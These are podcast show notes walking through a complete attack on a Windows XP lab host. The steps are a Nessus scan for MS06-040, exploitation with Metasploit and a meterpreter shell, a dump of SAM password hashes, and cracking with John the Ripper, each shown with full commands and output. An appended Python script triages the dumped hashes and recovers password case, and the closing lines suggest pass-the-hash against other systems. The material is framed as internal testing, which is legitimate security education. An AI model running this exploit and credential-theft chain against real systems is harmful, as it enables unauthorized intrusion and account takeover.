Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X; Ron will be emailing me as soon as he listens to the show 🙂) I run nessuscmd and tell it to OS fingerprint with -O, print out a full report with -V, use plugin ID 22194 (MS06-040) with -i, scan TCP ports 139 and 445 with -sS -p139,445, disable safe checks with -U, and test host 192.168.10.139.
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139
It reports:
Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the 'server' service.
|
| Description :
|
| The remote host is vulnerable to a buffer overrun in the 'Server'
| service which may allow an attacker to execute arbitrary code on the
| remote host with the 'System' privileges.
|
| Solution :
|
| Microsoft has released a set of patches for Windows 2000, XP and 2003 :
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
| Risk factor :
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS06-040, because it's just so delicious and begging to be devoured by Metasploit. I have Metasploit 3.1 installed on OS X:
/framework-3.1/trunk gordon$ ./msfconsole
(msfconsole ASCII-art banner)
=[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 62 aux

I want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139
Here is what my options look like:
msf exploit(ms06_040_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.10.139   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options:

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process
   LPORT     4444                                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into a file in my other directory, where John the Ripper is installed:
paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems, in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network and verifying vulnerabilities, all for free!
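A caveat worth checking before reusing "TEAMTED" elsewhere: the John run above loaded the LM halves only ("NT LM DES"), and LM hashing upper-cases the password, so the crack tells you the letters but not their case. The pwdump lines also say a lot before any cracking: an LM value of aad3b435b51404ee repeated twice means no LM hash is stored, a second half of aad3b435b51404ee means the password is 7 characters or shorter (as with TeamTed), and an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty string (as with Noone). The script below is an added example written for this write-up, not code from the show, Metasploit or John. It parses the hashdump format shown above, reports those findings, and recovers the real case of an LM-cracked password by hashing every case variant against the NT hash; the sample dump is constructed from the page's output (one redacted row kept), the function names are mine, and a small RFC 1320 MD4 is included because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
"""Triage a meterpreter hashdump and recover the case of an LM-cracked password.

Added example for this write-up, not code from the show, Metasploit or John.
Assumes pwdump-style lines (user:rid:LM:NT:::) like those hashdump printed;
the sample dump below is constructed from that output, with a redacted row kept.
NT hashes are MD4 over the UTF-16LE password, so a pure-Python MD4 is included.
"""
import itertools
import struct

EMPTY_LM_HALF = "aad3b435b51404ee"             # LM half for an empty 7-char block
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty string = blank NT password

# Constructed from the hashdump on this page (Administrator row left redacted on purpose).
SAMPLE_DUMP = """\
Administrator:500:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
"""


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over arbitrary bytes (pure Python, no OpenSSL dependency)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (hh, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                # one MD4 step, then rotate register roles (a,b,c,d) -> (d,a,b,c)
                a, b, c, d = d, _rotl((a + fn(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[i % 4]), b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 of the UTF-16LE encoded password, as a hex string."""
    return md4(password.encode("utf-16-le")).hex()


def _is_hex32(s: str) -> bool:
    return len(s) == 32 and all(ch in "0123456789abcdef" for ch in s)


def parse_pwdump(dump: str):
    """Yield (user, rid, lm, nt) from pwdump-format lines; hashes are lower-cased."""
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[:4]
        yield user, int(rid), lm.lower(), nt.lower()


def triage(dump: str) -> dict:
    """What the hashes reveal before cracking: blank passwords, LM presence, length band."""
    findings = {}
    for user, _rid, lm, nt in parse_pwdump(dump):
        if not (_is_hex32(lm) and _is_hex32(nt)):
            note = "redacted or unparseable"
        elif nt == EMPTY_NT:
            note = "blank password"
        elif lm == EMPTY_LM_HALF * 2:
            note = "no LM hash: password over 14 chars or LM storage disabled"
        elif lm[16:] == EMPTY_LM_HALF:
            note = "LM hash present, password is 1-7 chars"
        else:
            note = "LM hash present, password is 8-14 chars"
        findings[user] = note
    return findings


def recover_case(lm_plaintext: str, nt: str):
    """LM cracks come back upper-cased; try every case variant against the NT hash."""
    choices = [(ch.lower(), ch.upper()) if ch.isalpha() else (ch,) for ch in lm_plaintext]
    for variant in itertools.product(*choices):
        candidate = "".join(variant)
        if nt_hash(candidate) == nt.lower():
            return candidate
    return None  # the LM guess is not the NT password in any casing


if __name__ == "__main__":
    for user, note in triage(SAMPLE_DUMP).items():
        print(f"{user:18} {note}")
    # TeamTed's NT hash from the page; prints None if no casing of TEAMTED matches it
    print("TeamTed real case:", recover_case("TEAMTED", "e5128e6a0a230f4c0234591b3f7721dd"))
```

recover_case walks at most 2^n variants for n letters, which is trivial for a 7-character LM half; for a full 14-character LM crack (two halves joined) it is still only 16384 MD4 calls. Whether or not the case is recovered, the NT hash itself is enough for a pass-the-hash attempt against the other systems, so the cracked text mainly matters for services that need the cleartext.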